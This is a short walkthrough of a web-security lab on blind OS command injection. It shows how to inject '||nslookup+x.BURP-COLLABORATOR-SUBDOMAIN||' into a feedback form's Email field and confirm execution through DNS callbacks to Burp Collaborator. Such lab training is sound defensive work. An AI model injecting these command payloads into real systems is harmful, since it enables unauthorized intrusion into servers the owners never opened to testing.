Blind OS command injection with out-of-band interaction
Lab Description

Walkthrough
Step 1: Understanding the Feedback Functionality
The Submit Feedback page contains four input fields:
Name
Email
Subject
Message
Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions via DNS lookups to Burp Collaborator.

Step 2: Intercepting the Feedback Request
Using Burp Suite, intercept the HTTP request when submitting feedback. The intercepted request will contain parameters corresponding to the form inputs.
Objective: Modify one of these parameters to execute a payload that triggers a DNS lookup to Burp Collaborator.

Step 3: Crafting and Injecting the Payload
In the Email field, inject the following payload:
||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
This payload triggers a DNS lookup for the subdomain generated by Burp Collaborator, confirming that the server executes commands.
Payload Breakdown:
||
: Ends the existing shell command.nslookup
: A command to perform DNS lookups.x.BURP-COLLABORATOR-SUBDOMAIN
: Replacesx
with the generated subdomain for monitoring.
Submit the request with the modified payload.
The server responds with 200 OK, indicating the payload was executed.

Step 4: Verifying Out-of-Band Interaction
Switch to the Burp Collaborator tab and click Poll now.
Observe DNS requests generated by the server to your subdomain.

Why Use Out-of-Band Interaction?
When the server does not return command output or write it to an accessible location, OOB interaction is the best way to verify that a command was executed. DNS lookups leave a trace on external systems, enabling confirmation of blind vulnerabilities without requiring direct output.
Last updated
Was this helpful?